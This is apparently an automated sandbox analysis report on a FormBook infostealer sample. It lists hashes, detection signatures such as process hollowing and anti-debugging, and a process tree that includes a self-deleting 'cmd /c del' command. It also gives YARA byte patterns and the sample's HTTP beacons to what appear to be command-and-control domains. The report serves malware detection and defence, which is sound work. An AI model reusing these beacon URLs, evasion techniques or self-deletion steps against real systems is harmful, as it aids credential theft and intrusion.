
Analysis Report ASQ2109942.exe

Overview

General Information

Sample Name: ASQ2109942.exe
Analysis ID: 299290
MD5: 693849c501a595f56ca33ce5ca0ef2a2
SHA1: 90b1a338a8d98b95bcb61c786c27833a79ded566
SHA256: a76869f6ece56a889175cb2cebdb60e4a24025184ebeb7fa9c6210668eb023fe
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • ASQ2109942.exe (PID: 6628 cmdline: 'C:\Users\user\Desktop\ASQ2109942.exe' MD5: 693849C501A595F56CA33CE5CA0EF2A2)
    • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • ASQ2109942.exe (PID: 6892 cmdline: C:\Users\user\Desktop\ASQ2109942.exe MD5: 693849C501A595F56CA33CE5CA0EF2A2)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • mstsc.exe (PID: 6200 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 6224 cmdline: /c del 'C:\Users\user\Desktop\ASQ2109942.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16079:$sqlite3step: 68 34 1C 7B E1
  • 0x1618c:$sqlite3step: 68 34 1C 7B E1
  • 0x160a8:$sqlite3text: 68 38 2A 90 C5
  • 0x161cd:$sqlite3text: 68 38 2A 90 C5
  • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x73c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x132ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x816a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x8ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18157:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x191ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.ASQ2109942.exe.600000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.2.ASQ2109942.exe.600000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.2.ASQ2109942.exe.600000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x15279:$sqlite3step: 68 34 1C 7B E1
  • 0x1538c:$sqlite3step: 68 34 1C 7B E1
  • 0x152a8:$sqlite3text: 68 38 2A 90 C5
  • 0x153cd:$sqlite3text: 68 38 2A 90 C5
  • 0x152bb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x153e3:$sqlite3blob: 68 53 D8 7F 8C
0.2.ASQ2109942.exe.8a0000.1.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.ASQ2109942.exe.8a0000.1.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: ASQ2109942.exe | ReversingLabs: Detection: 16%
Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: ASQ2109942.exe | Joe Sandbox ML: detected
Source: 5.2.ASQ2109942.exe.600000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.ASQ2109942.exe.8a0000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 0_2_0090F97B FindFirstFileExW,0_2_0090F97B
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_0090F97B FindFirstFileExW,5_2_0090F97B

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49771
Source: Traffic | Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.4:49775
Source: global traffic | HTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=OcXrvyKYC4qOC5yHOKhuHsUYXP3TwHrkwQfsx0VRdIV01sjFBCbNndHKW/o0DBl3B9Dj HTTP/1.1 Host: www.wilsoncamargoycia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xnc/?Cj=jdeLL+g3OgRmWnBlBwPxY1ZAqvAtu9DUnFlhpdsDbml/l7Ikkb0zoiP+pqMvkKKdSj7r&D8P=Br-0dH HTTP/1.1 Host: www.euphoricjewelzz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xnc/?Cj=PmiJRqxQySb9hpfMquY4tP+aRPjIInfRRjTPr8kO1yJ4ZaEnxW7eiY5QVD1NlNhc8FOd&D8P=Br-0dH HTTP/1.1 Host: www.36rn.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=mP9o+B50ixDTmjMOxe5AQ0h/ik01hZ61mJYkjQK2kJ1kjDu+M59KV+tfuMuHt1B4Gov8 HTTP/1.1 Host: www.studio-alfarasha.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xnc/?Cj=FYfhhZSHsfOnsKkWHClrJR2TlA/j+Ccrgo2TgInX2Dj4taYVRoGOVIInf5Ia+DzU//j9&D8P=Br-0dH HTTP/1.1 Host: www.consultation-hippopotame.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xnc/?Cj=eGPNYRZO7eCFJQw/gPMc6MXdjTs5xQ34M+iLxqLYic8rteAXSXPpq2ETG67x2oDIutFc&D8P=Br-0dH HTTP/1.1 Host: www.neurofitdrink.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=YW7JIKUvxL6SFuLE6jZJv/RmdoycTi46qJU/qh1/IQ3QQ1C1c2NDiWYkG6rPB5jzbki3 HTTP/1.1 Host: www.ruartemoyano.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xnc/?Cj=dKuJMJDWInUgmzajpInQduQqn4toHzINAGVDFywKs65z5Kn4pqDzcnkN6tBt9WHT+nBD&D8P=Br-0dH HTTP/1.1 Host: www.visacoincard.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /xnc/?D8P=Br-0dH&Cj=Ok9AvPWPUKYaePVTL6j/d+7uOADfF/hwNe2/6JFu0ZvSkbhtf3C2Uccjo1JF0BiznP5J HTTP/1.1 Host: www.batttleroyaleuk.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 209.99.64.55 209.99.64.55
Source: Joe Sandbox View | IP Address: 208.91.197.39 208.91.197.39
Source: Joe Sandbox View | ASN Name: LINODE-APLinodeLLCUS LINODE-APLinodeLLCUS
Source: Joe Sandbox View | ASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS AMAZON-AESUS
Source: C:\Windows\explorer.exe | Code function: 7_2_04E09402 getaddrinfo,setsockopt,recv,7_2_04E09402
Source: unknown | DNS traffic detected: queries for: www.wilsoncamargoycia.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/10.0 Date: Fri, 16 Oct 2020 13:47:55 GMT Connection: close Content-Length: 1245
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://i1.cdn-image.com/__media__/pics/7985/netsol-logos.jpg
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.2
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/7985/logo.png
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/8932/arrows.jpg)
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/8934/lst_arr.jpg)
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://i3.cdn-image.com/__media__/pics/8934/frt_arr.jpg)
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/7985/headerstrip.gif)
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/8934/rcomlogo.jpg
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://i4.cdn-image.com/__media__/pics/8934/srch-bg.gif)
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://survey-smiles.com
Source: explorer.exe, 00000007.00000002.926900863.0000000002B50000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.Visacoincard.com
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.consultation-hippopotame.com/All_Inclusive_Vacation_Packages.cfm?fp=%2FJNXTkkJKOkRXMQTqIh
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.consultation-hippopotame.com/Anti_Wrinkle_Creams.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9K0rR
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.consultation-hippopotame.com/Credit_Card_Application.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.consultation-hippopotame.com/Dental_Plans.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9K0rRArNFMlV
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.consultation-hippopotame.com/Healthy_Weight_Loss.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9K0rR
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.consultation-hippopotame.com/find_a_tutor.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9K0rRArNFMlV
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.consultation-hippopotame.com/music_videos.cfm?fp=%2FJNXTkkJKOkRXMQTqIhapFAWRi9K0rRArNFMlV
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.consultation-hippopotame.com/xnc/?Cj=FYfhhZSHsfOnsKkWHClrJR2TlA/j
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.networksolutions.com/
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.register.com/?trkID=WSTm3u15CW
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.register.com?trkID=WSTm3u15CW
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.visacoincard.com/px.js?ch=1
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.visacoincard.com/px.js?ch=2
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: http://www.visacoincard.com/sk-logabpstatus.php?a=bTkvQXVIY29ocWNFMFhFSkY2aytLNW9Fb3lHWHpnMzgvNG43ek
Source: explorer.exe, 00000007.00000000.714998622.000000000B976000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: https://www.domain.com/controlpanel/domaincentral/3.0/
Source: mstsc.exe, 0000000C.00000002.928536170.0000000005BED000.00000004.00000001.sdmp | String found in binary or memory: https://www.register.com/whois.rcmx?domainName=Visacoincard.com
Source: C:\Windows\explorer.exe | Code function: 7_2_04E03042 OpenClipboard,7_2_04E03042

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.924444955.0000000001060000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.732076102.0000000000601000.00000020.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.734679280.0000000000930000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.926694573.0000000005030000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.689992016.00000000008A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.734762726.0000000000960000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.926553186.0000000005000000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.ASQ2109942.exe.600000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.ASQ2109942.exe.8a0000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.ASQ2109942.exe.8a0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D098F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D099A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D095D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D096E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D097A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\ASQ2109942.exe | Code function: 5_2_00D09710 NtQueryInformationToken,LdrInitializeThunk
